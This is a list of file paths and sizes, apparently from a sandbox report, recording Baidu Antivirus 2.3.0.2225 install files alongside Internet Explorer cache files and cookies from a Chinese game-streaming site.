%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOAcceleratorPlugin.dll (6424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (111370 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixer.dll (267 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\TrustAndIso.dll (262 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\LocalPluginInfo.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMSOAccCoolyPlugin.dll (1834 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOTurbo.rdb (18 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCScriptBind.dll (3815 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\CommonRes.rdb (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerPreScan.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\PluginManager\PluginConfig.db (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTips.rdb (183 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMsg.dll (49 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (2132 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSWManagerFrame.dll (3725 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAn.exe (1683 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMScriptVM.dll (213 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\hips.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMSetting.rdb (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDDownloader.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll.bdl (386923 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASWAcc.exe (46 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTinyXml.dll (181 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86 (4 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDLogicUtils.dll.bdl (46921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNet.dll.bdl (32387 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccStrategyMgr.dll (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\res\onlineWnd.zip (14184 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMainFrame.dll (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SWManager.rdb (1812 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0001.sys (70 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSkin.dll (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\tmpjnmhqw.dll (27504 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSCleaner.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerScript.dat (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMUpdate.dll (3729 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceConfig.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\a644398e96b2e49d735a01f51e447930.bdt (3 bytes)
%System%\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\uninst.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMCommon.dll (1609 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDCooly.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMConnect.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASoftmgr.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\PluginManager.dll (6359 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDAFileHelper.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SiteInspection.rdb (1868 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\kav_compatible.dat (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bg_tips_speed_win8.png (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_class_filter.db (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0001.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0002.sys (218 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysAccelerator.rdb (1742 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDKitUtils.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_repairproperty.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSafePlugin.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMKVMainPlugin.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\MainframePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMAVEng.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCallbackBind.dll (24 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepMgr.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SusPlugin.rdb (163 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\HotPlugins.xml (386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerLuaScript.dat (145 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMDownload.dll (324 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\GlobalPluginInfo.xml (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_appassext.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\blacksign.dat (537 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMProcessRunningTime.dll (82 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerScript.dat (58 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMBase.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPluginContainerConfig.xml (380 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_WIN7_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVMain.rdb (55 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Mainpage.rdb (3831 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SafePlugin.rdb (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\å¸载百度å«士.lnk (796 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Unknownfile.rdb (48 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\websafe\WebSafe.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\CompatibilityChecker.dll (140 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceCleanerConfig.dat (5 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMTrayTipsPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMPatcher.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt64.dll (3664 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\pluginUnit.dat (727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMReport.dll.bdl (35046 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOTraceConfig.xml (9 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOAccTrayPlugin.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTips.exe (3743 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (552 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0001.sys (160 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOManager.rdb (1741 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\homepage.ini (361 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMSOAccSusPlugin.dll (3737 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccDataMgr.dll (168 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0002.dll (1749 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMCoolyContainerConfig.xml (465 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\hu.dll (3312 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch\publish.db (30058 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDArKit.sys (80 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Patcher.rdb (143 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\PatcherContainer.xml (563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\Pizmdb.7z (188613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\DriverManager.dll (119 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWParseDetect.dll (1613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMWindowsLib.dll (99 bytes)
%Documents and Settings%\All Users\Desktop\百度å«士.lnk (811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMNet.dll (6392 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\SafePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\BDLogicUtils.dll (3832 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOCleanerTrayPlugin.dll (3757 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDAVCache.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\EnhanceBoost.dll (275 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccEngine.dll (111 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_XP_x86.sys (95 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMReport.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDEnhanceBoost.sys (96 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0002.sys (205 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDMNetMon_WIN7_x64.sys (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCommunicate.dll (28 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll (131 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDKV.rdb (29 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\bduf.dll (3823 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMFrameWork.dll (271 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMPatcherPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\HIPS.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSAccMgrDll.dll (3761 bytes)
%System%\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmswmanagerplugins\BDMSWManagerView.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDALeakfixer.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOCleanerPlugin.dll (15801 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\2015604100\Setting\host.dat (306 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_extlist.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMNetMonMgrDll.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerConfig.dat (6 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\StartupDict.dat (1783 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\RtpContainerConfig.xml (474 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMPatchAgent.dll (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[2].js (6467 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[2].js (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[1].js (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\selected_page[1].html (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[1].js (6022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\selected_page[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[2].jpg (2563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAJQTKHL.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[13].jpg (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\openicon[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\select-normal[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[2].jpg (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[10].jpg (3658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\banner-kingston-20140815[1].jpg (27043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[2].js (3574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[2].jpg (4640 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[1].css (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[5].jpg (4787 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\www.fengyunzhibo[1].xml (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1] (1850 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@web.log.kukuplay[1].txt (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAQJ8FJ8.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\nav-bk[1].png (126 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery-1.8.3.min[1].js (62713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\user-icon[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\gameicon_s[1].png (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\default_avatar_s[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[2].js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[2].css (1361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\select-deep[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1].htm (2358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[1].js (176 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[4].jpg (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[4].jpg (1144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\QQüƬ20140316001047[1].jpg (30227 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[2].js (3255 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[3].jpg (585 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.fengyunzhibo[2].txt (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[1].jpg (1511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[2].js (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[1].js (2827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXC.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[1].jpg (2274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[1].js (363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\DD_belatedPNG_0.0.8a-min[1].js (3814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[1].js (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@log.kukuplay[2].txt (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[9].jpg (4187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[1].jpg (1731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CA8D6JGD.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[3].js (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[1].js (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v3[1].png (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\CAXPJNAK.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[2].js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[4].jpg (3347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[1].css (1106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v4[1].js (10653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[3].jpg (5088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[12].jpg (3048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[2].css (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[1].jpg (1384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[3].jpg (1176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\loading[1].gif (8152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-v4[1].css (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[7].jpg (1974 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[11].jpg (2814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\zhibo2[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[6].jpg (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\header-v3-media[1].css (612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\fystat.min[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@log.kukuplay[1].txt (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\sporticon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\stat[1].php (4386 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[2].txt (1186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[4].jpg (3096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\c[1].php (1163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\report[1].gif (43 bytes)
